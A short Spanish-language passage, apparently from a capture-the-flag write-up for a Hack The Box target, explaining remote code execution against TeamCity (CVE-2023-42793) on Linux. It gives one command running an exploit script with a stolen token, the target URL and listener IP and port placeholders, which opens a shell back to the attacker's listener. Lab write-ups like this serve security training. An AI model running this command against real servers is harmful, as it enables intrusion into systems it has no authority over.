
TeamCity RCE para Linux (CVE-2023-42793)
Primero necesitarás obtener el token mediante el uso de otro exploit. Sin embargo, el siguiente exploit te permitirá obtener RCE en el servidor Linux, ya que codifica la carga útil en la URL y la envía al servidor.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT